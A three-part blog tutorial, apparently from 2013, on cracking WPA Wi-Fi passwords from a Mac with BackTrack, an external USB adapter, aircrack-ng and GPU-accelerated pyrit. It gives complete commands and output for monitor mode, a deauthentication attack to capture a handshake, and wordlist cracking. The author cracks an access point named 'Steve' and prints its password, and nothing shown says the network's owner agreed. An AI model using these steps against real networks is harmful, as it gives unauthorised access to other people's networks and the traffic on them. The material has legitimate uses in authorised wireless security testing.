Cracking WiFis, the Apple way; part 3: OpenCL (or CUDA) and pyrit

(part1)
(part2)

Cracking the WPA password with aircrack is not fast, especially in a VM. So the first thing is to do the cracking outside of BackTrack. We have to get the .cap file out of the VM. Just drag it from the VM to the desktop.

Also using just the CPU is slow. GPUs these days can crack faster than the CPU.

X Code Command Line tools only

OS X Mountain Lion comes with OpenCL tools. X Code is big and most of it is iOS and OS X dev tools which we don't need. So only Command Line Tools can be installed. You have to have an Apple developer account to download it (it's free):

Screen Shot 2013-02-25 at 4.03.50 PM

Then:

Screen Shot 2013-02-25 at 4.03.29 PM

Click Next or Continue or whatever until it is done.

or X Code (full version)

Full X Code can be installed from the App Store:

Screen Shot 2013-02-24 at 10.43.40 PM

Then Command Line Tools have to be installed. Go to XCode, then Properties:

Screen Shot 2013-02-25 at 4.13.55 PM

Install Pyrit (AMD Radeon)

Pyrit is a python tool that cracks WPA passwords.

Prerequisites. Download these in a folder named PYRIT for example:

http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz

Then in the folder in terminal do:

tar -xzf  libdnet-1.12.tgz
cd libdnet-1.12
./configure
make
sudo make install
cd python
sudo python setup.py install
cd ../..
 
tar -xzf pylibpcap-0.6.4.tar.gz
cd pylibpcap-0.6.4
sudo python setup.py install
cd ..
 
tar -xzf scapy-latest.tar.gz
cd scapy-2.1.0
sudo python setup.py install
cd ..

Now, it's time for the pyrit tool:

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
 
cd pyrit-read-only
cd pyrit
sudo python setup.py install

Install Pyrit (NVidia)

Extra steps for NVidia:

Download nvidia driver from http://developer.nvidia.com/cuda/cuda-downloads.

If you don't have nvidia driver, you'll get: SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.

Check the first and second option:

Then:

cd ..
cd .. 
cd pyrit-read-only
cd cpyrit_cuda
sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install

Test Pyrit

On a macbook with ATI we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'OpenCL-Device 'ATI Radeon HD 6750M''
#2: 'CPU-Core (SSE2/AES)'
#3: 'CPU-Core (SSE2/AES)'
#4: 'CPU-Core (SSE2/AES)'
#5: 'CPU-Core (SSE2/AES)'
#6: 'CPU-Core (SSE2/AES)'
#7: 'CPU-Core (SSE2/AES)'
#8: 'CPU-Core (SSE2/AES)'

On a macbook with nVidia, we get something like:

$ pyrit list_cores
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
The following cores seem available...
#1: 'CUDA-Device #1 'GeForce 9400M''
#2: 'CPU-Core (SSE2)'

Note: I have no idea why when OpenCL or CUDA is installed it takes the place of one of the cores, on a quad-core we get 7 cores with OpenCL. When benchmarking it seems all cores are being utilized. I guess it's a bug.

Benchmarking

$ pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Running benchmark (7724.0 PMKs/s)... -
 
Computed 7723.98 PMKs/s total.
#1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8)
#3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9)
#4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0)
#5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9)
#6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8)
#7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8)
#8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9)

You can see that the GPU is faster than 7 cores (they should be 8, i don't know why one is missing)

Wordlists

Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html

gfxCardStatus

Make sure you're in Discrete Only mode.

Screen Shot 2013-02-25 at 12.38.06 AM

Otherwise pyrit will complain:

Exception in thread OpenCL-Device 'ATI Radeon HD 6750M':
[...]
SystemError: Failed to create command-queue (CL_INVALID_VALUE)
[...]
SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly

Cracking with Pyrit

$ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
 
Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)...
Parsed 3539 packets (3539 802.11-packets), got 115 AP(s)
 
Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically.
Attacking 20 handshake(s).
Tried 140007 PMKs so far; 7550 PMKs per second.
 
The password is 'forzajuve'.

--all-handshakes means that all handshakes in the file will be used together.

It will utilize the CPU and the GPU simultaneously. And now we get around 10k attempts/sec which is a lot better than aircrack-ng in a vm.

Note: your computer will unresponsive, make sure anything CPU or GPU intensive is switched off.

Some stuff was taken from here.

Check the wifis category for more tutorials.

Cracking WiFis, the Apple way; part 2: deauth attack; cracking WPA with aircrack-ng

(Go to part1)

Let's check the wi-fis:

# airodump-ng mon0

The Deauth attack

Now we choose which AP to attack. Let's choose Steve. The --bssid parameter says which AP to listen for, -c says on which channel should we stay and -w says the file we use to dump the authentication.

# airodump-ng mon0 --bssid 00:0F:01:37:1A:A0 -c 2 -w Steve.cap

Screen Shot 2013-02-24 at 9.35.15 PM

This attack is called the Deauth attack because we de-authenticate one client and wait for it to reconnect. -a is the AP, -c - the client we deauth, -0 is the attack, 1 means to perform it once only.

# aireplay-ng mon0 -0 1 -a 00:0F:01:37:1A:A0 -c F0:D1:A9:AE:E7:A5

Screen Shot 2013-02-24 at 9.38.43 PM

And we get the handshake.

Now we crack it. We will use a wordlist.

# aircrack-ng Steve-01.cap -w /pentest/passwords/wordlists/rockyou.txt

 

if the password is in the wordlist, then

Unfortunately this method can try only ~800 passwords per second from the wordlist. In later articles we'll see better approaches.

 

Cracking WiFis, the Apple way; part 1: external card, backtrack, aircrack-ng, the VM

OS X natively is no good

First, trying to crack wi-fi APs on OS X natively will not work great. KisMAC is not great, it cannot inject packets with the macbook's default wi-fi card. aircrack-ng does not work.

The usb wi-fi card

So to inject stuff, an external USB wi-fi is required. I have tried ALFA AWUS036NEH (chipset Ralink RT3070) and TP-Link TL-WN722N (chipset Atheros AR9271).

ALFA's are recommended by half the internet, but I think they suck. My Alfa is not stable, it doesn't work with BT5R3, only BT5R2. The Atheros is a lot better, but no 5Ghz. I'm waiting for NETGEAR WNDA3200 which has 5Ghz radio that works simultaneously with the 2.4Ghz radio.

The VM

The best VM to use is BackTrack - all the cracking tools are inside. Latest version is BT5R3. It even comes as a prebuilt VMware virtual machine. I'm using VMware Fusion on OS X.

(user: root, pass: toor; startx to launch gnome):

Adding the card to the USB:

Screen Shot 2013-02-24 at 8.08.52 PM

Then in terminal we check for a wi-fi card. We find one on wlan1 and start a monitoring interface for it.

# airmon-ng
# airmon-ng start wlan1
# airmon-ng

Then, let's check the wi-fis:

# airodump-ng mon0

In later articles we'll see how to hack the wi-fi.